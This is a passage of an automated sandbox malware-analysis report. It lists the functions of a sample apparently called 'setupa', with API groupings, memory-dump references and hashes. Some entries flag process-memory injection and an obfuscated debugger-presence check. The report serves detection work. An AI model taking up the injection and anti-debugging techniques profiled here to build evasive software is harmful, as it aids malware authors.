                                                                                                              Function 00007FF689641717 Relevance: 1.5, APIs: 1, Instructions: 37injectionCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0
                                                                                                              • Opcode ID: 2fa483fc19e378228302cf4702eb302a93b4c0d94deb30604db21e839a7aa62c
                                                                                                              • Instruction ID: f9ea319406a6eba62fa32df8cb81805664ed450b1ed0fb41d5d2221ffaf93bfb
                                                                                                              • Opcode Fuzzy Hash: 2fa483fc19e378228302cf4702eb302a93b4c0d94deb30604db21e839a7aa62c
                                                                                                              • Instruction Fuzzy Hash: 5A01882AB10B91C2E710CF16A8086AD67A8FB98FC1F684279EF5893711CF38D542C740
                                                                                                              Function 00007FF68964350D Relevance: 1.5, APIs: 1, Instructions: 21libraryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 757 7ff68964350d-7ff68965dbf2 LoadLibraryA 759 7ff68965dc06-7ff68965dc0b 757->759 760 7ff68965dbf4-7ff68965dbff GetProcAddress 757->760 760->759
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LibraryLoad
                                                                                                              • String ID:
                                                                                                              • API String ID: 1029625771-0
                                                                                                              • Opcode ID: ebb58982cea268ef58c051426426f058be4909e0bc52d214547d2cebb7a7e65f
                                                                                                              • Instruction ID: fd041eefe7420d40f7aef5d97b4c1693df13c48b53fde4137b6a3e57a28851e7
                                                                                                              • Opcode Fuzzy Hash: ebb58982cea268ef58c051426426f058be4909e0bc52d214547d2cebb7a7e65f
                                                                                                              • Instruction Fuzzy Hash: FCE048D6E49586C3FA594F55645527517C0EF26FD5E0C117CCA1C553C2DD2CE0D1D304
                                                                                                              Function 00007FF6896440FC Relevance: 1.3, APIs: 1, Instructions: 35memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ExitThread$AllocCloseFreeHandleHeapLibrary
                                                                                                              • String ID:
                                                                                                              • API String ID: 2953685951-0
                                                                                                              • Opcode ID: 1654a14da99ad6242d2779c7e4f180efcdf412fc0eeb0cc2b29fae509ee055d0
                                                                                                              • Instruction ID: 5a1be6b70d4f782b9565fcb00a28b05514d11138bbe421702c300508e4ea245e
                                                                                                              • Opcode Fuzzy Hash: 1654a14da99ad6242d2779c7e4f180efcdf412fc0eeb0cc2b29fae509ee055d0
                                                                                                              • Instruction Fuzzy Hash: CDF01D21F1D207C6FA246FB158612B512817F56FE3F185B38D92ECA6C1DE2CA480D611
                                                                                                              Function 00007FF689643779 Relevance: 1.3, APIs: 1, Instructions: 15COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 2962429428-0
                                                                                                              • Opcode ID: 5d4c14f095bd13ed5ed1d584fb225d85a201909bf4a6d7e30073ab8ad903ccdc
                                                                                                              • Instruction ID: 61ffcee9935724154fe6af046e9977c1074fb131d6a0423fd4660b4c344b446f
                                                                                                              • Opcode Fuzzy Hash: 5d4c14f095bd13ed5ed1d584fb225d85a201909bf4a6d7e30073ab8ad903ccdc
                                                                                                              • Instruction Fuzzy Hash: 41D0A771E0598AC2FA102E7D959403C6310AF58F72B385534C52F863E3DD1CC4D2D744

                                                                                                              Non-executed Functions

                                                                                                              Function 00007FF689644142 Relevance: 145.5, APIs: 42, Strings: 41, Instructions: 239libraryloaderCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$EncodeHandleModulePointer
                                                                                                              • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                                                              • API String ID: 73157160-295688737
                                                                                                              • Opcode ID: fd85ed9c118ea9e1572a2e8e6efdb1bd63540041d78c075f14bb4afec17b13ea
                                                                                                              • Instruction ID: 6de3cc8105f8c104e6547a5ce000280211efe663f161d4f18b4d7605b9a67f23
                                                                                                              • Opcode Fuzzy Hash: fd85ed9c118ea9e1572a2e8e6efdb1bd63540041d78c075f14bb4afec17b13ea
                                                                                                              • Instruction Fuzzy Hash: C9E14778A29B47D1FA449F61F89406923A1FF59FD2F85643DC80E97220EE7CE1A9C350
                                                                                                              Function 00007FF68964437C Relevance: 26.3, APIs: 6, Strings: 9, Instructions: 56libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DebuggerLibraryPresent$AddressCurrentFreeLoadProcProcess
                                                                                                              • String ID: .$3$e$gerP$k$l$nt$r$rese
                                                                                                              • API String ID: 3962861327-1167263003
                                                                                                              • Opcode ID: d2dfd9bb01c9b96864fd71735602551593babdd7bf391298f7bddd65d8d3ec6c
                                                                                                              • Instruction ID: 405d00699044bec9e76e2b1f6c892af44096f7bcc50caf5513ffb88fa18b52fe
                                                                                                              • Opcode Fuzzy Hash: d2dfd9bb01c9b96864fd71735602551593babdd7bf391298f7bddd65d8d3ec6c
                                                                                                              • Instruction Fuzzy Hash: 90215776E09752CAF701CF62A4441AD27B5BF54F89B14803CCE4AA7B08DF78D585CB50
                                                                                                              Function 00007FF68964497B Relevance: 14.6, APIs: 3, Strings: 4, Instructions: 2312COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy_s
                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                              • API String ID: 1502251526-2761157908
                                                                                                              • Opcode ID: 6965fd0a0cac8fe04cfafca7a233755c2481c3427dbbe554813bda7e232fbefa
                                                                                                              • Instruction ID: 641a811015c02a0d08266b087643133cc7bd62ba8e5f0b89b9776617ef857a6f
                                                                                                              • Opcode Fuzzy Hash: 6965fd0a0cac8fe04cfafca7a233755c2481c3427dbbe554813bda7e232fbefa
                                                                                                              • Instruction Fuzzy Hash: A4B2C272A08282CFE7658E7994406FD27A5FF84BCDF905139DA0A97B84DF38E944DB40
                                                                                                              Function 00007FF689641D98 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Locale$CodeInfoPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                              • String ID:
                                                                                                              • API String ID: 2191266518-0
                                                                                                              • Opcode ID: 62c1ae0b41638935006e9e636ee6bdedff1646985e30343f695f0234d7bdcc7e
                                                                                                              • Instruction ID: e867b75cdfd3b53b10e48a71f9c0cfb18088ae44c13a85fd356384ea7dbe7ecf
                                                                                                              • Opcode Fuzzy Hash: 62c1ae0b41638935006e9e636ee6bdedff1646985e30343f695f0234d7bdcc7e
                                                                                                              • Instruction Fuzzy Hash: 5B715922F18602CAFB659F71D8516BD23A0BF48F86F844439CA0D93A95EF3CE945E750
                                                                                                              Function 00007FF68964471E Relevance: 9.4, APIs: 6, Instructions: 393COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy_s
                                                                                                              • String ID:
                                                                                                              • API String ID: 1502251526-0
                                                                                                              • Opcode ID: fc4a08998613a55882e473a0ce31395ae2e165673b4f18d968b3d4f71c73215e
                                                                                                              • Instruction ID: e5f249764ddd629a4ef84c2cce122d60aef488a1e3135351db98707d925d1b9a
                                                                                                              • Opcode Fuzzy Hash: fc4a08998613a55882e473a0ce31395ae2e165673b4f18d968b3d4f71c73215e
                                                                                                              • Instruction Fuzzy Hash: 5EF19572A08252C6E764CF64E4156F9B7A4FF89F89F905139EB0987B84DF39E900DB40
                                                                                                              Function 00007FF6896451FF Relevance: 9.2, APIs: 6, Instructions: 249COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy_s
                                                                                                              • String ID:
                                                                                                              • API String ID: 1502251526-0
                                                                                                              • Opcode ID: e5123d556de0ccaa47ff0b214ba53b848dae960595974794954e9e9589f5bcfe
                                                                                                              • Instruction ID: 965f9b9442b33bdf20abedf5a556efcf74241702458fd814f8e733667eee7c54
                                                                                                              • Opcode Fuzzy Hash: e5123d556de0ccaa47ff0b214ba53b848dae960595974794954e9e9589f5bcfe
                                                                                                              • Instruction Fuzzy Hash: D6A19472608282C6EB748F25A1416B9B7A1FF58FC5F905139DB8E87B45CE3CE904DB40
                                                                                                              Function 00007FF689642905 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 1239891234-0
                                                                                                              • Opcode ID: ccff9d385fd947602728c7a33772e0aa51e8e8df803f0f43ba0b82f7e2ded9d9
                                                                                                              • Instruction ID: 7df1975bee835c318869e046ed9dff26f290725a6fb3c57a2b03099c0081b1a7
                                                                                                              • Opcode Fuzzy Hash: ccff9d385fd947602728c7a33772e0aa51e8e8df803f0f43ba0b82f7e2ded9d9
                                                                                                              • Instruction Fuzzy Hash: 7E415336A18B81C5EB60CF65E8502AE73A0FF84B95F500139EA9D87B55DF3CD595CB00
